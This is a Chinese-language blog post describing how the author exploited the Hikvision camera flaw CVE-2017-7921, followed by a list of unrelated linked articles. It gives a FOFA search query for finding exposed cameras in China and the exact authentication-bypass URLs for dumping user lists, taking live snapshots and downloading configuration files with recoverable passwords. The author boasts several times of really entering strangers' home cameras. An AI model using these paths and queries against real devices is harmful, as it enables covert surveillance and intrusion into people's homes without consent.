海康威视摄像头入侵+fofa(CVE-2017-7921)

By:Jesse


重保期间实在是太无聊,于是就找了个海康威视的摄像头日日玩,结果一玩就是一天呢哈哈哈。

1.漏洞编号

CVE-2017-7921

2.漏洞概述

通过构造url进行检索所有用户、屏幕截图、配置文件下载,通过解码工具破解后台的账户密码,从而实时监控,想想还是非常危险的,万一入侵到别人家里的摄像头,你的生活全在别人的屏幕前。在把玩的过程中的确找到了别人家里的摄像头。

3.影响版本

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
版本至5.4.0build160530版本;
DS-2CD2xx0F-ISeries5.2.0build140721
版本至5.4.0Build160401版本;
DS-2CD2xx2FWDSeries5.3.1build150410
版本至5.4.4Build161125版本;
DS-2CD4x2xFWDSeries5.2.0build140721
版本至5.4.0Build160414版本;
DS-2CD4xx5Series5.2.0build140721
版本至5.4.0Build160421版本;
DS-2DFxSeries5.2.0build140805
版本至5.4.5Build160928版本;
DS-2CD63xxSeries5.0.9build140305
版本至5.3.5Build160106版本

4.漏洞复现

那么后台地址去哪里找呢?,我使用得fofa但是这个网站没有会员的话比较不友好。

app="HIKVISION-视频监控" && country="CN"



可以到海康威视的摄像头在世界上的占有率相关可观,在中国应该算是业界老大,那这么多摄像头,一定会有没有及时打补丁的吧!

具体利用过程
1.利用路径:http://camera.ip/Security/users?auth=YWRtaW46Mg
YWRtaW46Mg admin:2的base64编码
实际上这边只要不是1都可以访问到,可以看到只有一个账户是admin

2,无需身份验证即可获取相机快照
利用路径:http://camera.ip/onvif-http/snapshot?auth=YWRtaW46Mg



细思极恐啊!!!!未授权直接就看到画面了,即使你破解不了密码,你设置一个刷新频率,也能实时监控画面。在fofa搜索的过程中,的的确确入侵到别人家里的摄像头了非常之恐怖。

3.最糟糕的是,可以下载相机配置:
利用路径:http://camera.ip/System/configurationFile?auth=YWRtaW46Mg



omg!!!

不幸的是,配置备份文件包含所有配置用户的用户名和纯文本密码。虽然文件被加密,但加密很容易逆转,因为海康威视选择使用静态加密密钥,该密钥源自密码“abcdefg”。其他海康威视产品也有类似的弱加密机制。

BUT!!!办法总比困难多,网上比较多的是csdn的下载但是要money,怎么能便宜了这些资本家呢,github有解码脚本,但是不太好找。

4.解码过程,获得密码



成功入侵~~~太可怕了

5.修复建议

官方是没有给过修复建议的,就不要安装有问题的摄像头吧真的挺危险的。

时间线

2017 年 3 月 5 日:发现后门。
2017 年 3 月 6 日:海康威视通知了后门,提供了技术细节。
2017 年 3 月 7 日:海康威视确认漏洞并承诺固件更新。
2017 年 3 月 12 日:海康威视向合作伙伴发布了一份关于该漏洞的备忘录。海康威视开始为受影响的设备发布固件更新。
2017 年 5 月 4 日:ICS-Cert 发布咨询 ICSA-17-124-01
2017 年 9 月 11 日:完整披露分发列表中发布的漏洞详细信息。

参考链接

https://packetstormsecurity.com/files/144097/hikvisionip-bypass.txt

海康威视摄像头入侵+fofa(CVE-2017-7921)的更多相关文章

  1. OpenCV+海康威视摄像头的实时读取

    OpenCV+海康威视摄像头的实时读取 本文由 @lonelyrains出品.转载请注明出处. 文章链接: http://blog.csdn.net/lonelyrains/article/detai ...

  2. 海康威视摄像头+OpenCV+VS2017 图像处理小结(二)

    海康威视摄像头+OpenCV+VS2017 图像处理小结(二) https://blog.csdn.net/o_ha_yo_yepeng/article/details/79825648 目录 一.海 ...

  3. 保障视频4G传输的流畅性,海康威视摄像头相关设置

    我们目前的rtsp视频解决方案如下: 摄像头<---------->NVR(通过4G上传)<---------->easydarwin<---------->自己的 ...

  4. 海康威视摄像头SDK-网页版(NetVideoActiveX23.cab安装)

    1.了解了OCX控件的使用.代码如下: <object classid="CLSID:CAFCF48D-8E34-4490-8154-026191D73924" codeba ...

  5. OneAPM大讲堂 | 基于图像质量分析的摄像头监控系统的实现

    今天咱们要介绍的技术很简单,请看场景: 你在家里安装了几个摄像头想监视你家喵星人的一举一动,然而,就在喵星人准备对你的新包发动攻击的时候,图像突然模糊了.毕竟图像模糊了以后你就没法截图回家和喵当面对质 ...

  6. 捕获海康威视IPCamera图像,转成OpenCV能够处理的图像(二)

    海康威视IPCamera图像捕获 捕获海康威视IPCamera图像.转成OpenCV能够处理的IplImage图像(一) 捕获海康威视IPCamera图像.转成OpenCV能够处理的IplImage图 ...

  7. 捕获海康威视IPCamera图像,转成OpenCV能够处理的图像(一)

    海康威视IPCamera图像捕获 捕获海康威视IPCamera图像,转成OpenCV能够处理的IplImage图像(一) 捕获海康威视IPCamera图像.转成OpenCV能够处理的IplImage图 ...

  8. vlc+flv.js 摄像头 H5 直播

    背景 业务需求:用最短的时间搞定摄像头直播到Web页面.因为没有过这方面经验,所以走了很多弯路,其实也不算弯路吧,大部分时间花在学习基础概念,寻找快速方案中.惯性思维想当然的以为找组件,配地址就能搞定 ...

  9. 5月第2周业务风控关注 | 央行:严禁未经授权认可的APP接入征信系统

    本文由  网易云发布. 易盾业务风控周报每周呈报值得关注的安全技术和事件,包括但不限于内容安全.移动安全.业务安全和网络安全,帮助企业提高警惕,规避这些似小实大.影响业务健康发展的安全风险. 1.央行 ...

随机推荐

  1. Ribbon导航

    简介 最近都在弄微服务的东西,现在来记录下收获.我从一知半解到现在能从0搭建使用最大的感触有两点 1.微服务各大组件的版本很多,网上很多博客内容不一定适合你的版本,很多时候苦苦琢磨都是无用功 2.网上 ...

  2. [bug] @Test注解无法使用

    参考 https://blog.csdn.net/lixiangxiang666/article/details/83745901

  3. [Web] 计算机网络课程(一)

    局域网 覆盖范围小,自己花钱买设备,自己单位维护 线长不超过100米,带宽固定(10M 100M 1000M) 星形结构,上层交换机口少,但每个口带宽高 广域网 距离远 如在家通过ADSL拨号上网,或 ...

  4. CentOS 7配置静态IP地址的两种方法 来自:互联网

    CentOS 7配置静态IP地址的两种方法 来自:互联网 时间:2021-01-12 阅读:4 如果你想要为CentOS 7中的某个网络接口设置静态IP地址,有几种不同的方法,这取决于你是否想要使用网 ...

  5. xsos:一个在Linux上阅读SOSReport的工具

    xsos:一个在Linux上阅读SOSReport的工具 时间 2019-05-23 14:36:29  51CTO 原文  http://os.51cto.com/art/201905/596889 ...

  6. VulnHub系列(一)DC-1

    环境 kali linux 和 DC-1 都是搭建在VMware上的虚拟机,都是NAT模式. 主机发现 NAT模式下虚拟机没有被分配真实的ip地址,他们通过共享宿主机的ip地址访问互联网.我们可以通过 ...

  7. Chrome 红色和 Chromium蓝色 区别:logoChrome 红色和 Chromium蓝色;Chrome闭源和 Chromium开源;

    我们知道Chromium采用的BSD开源协议(Chromium首页.文档和下载),google chrome是闭源的("9.2 根据第 1.2 条规定,除非法律明确允许或要求,或经谷歌明确书 ...

  8. Java 线程池 ThreadPoolExecutor 的使用

    引言 JAVA 语言为我们提供了两种基础线程池的选择: ThreadPoolExecutor ScheduledThreadPoolExecutor 它们都实现了 ExecutorService 接口 ...

  9. ntp导致的时钟回拨

    ntp导致的时钟回拨 时钟回拨 我们的服务器时间校准一般是通过ntp进程去校准的.但由于校准这个动作,会导致时钟跳跃变化的现象. 而这种情况里面,往往回拨最能引起我们的困扰,回拨如下所示: 会引起什么 ...

  10. 缩放 transform

    转换属性 transform 转换是css3中的一个特征,可以实现元素的缩放,位移,变形. 作用: 使元素在位置或者形状上发生一定的改变. 属性: transform 属性值: scale:缩放(一般 ...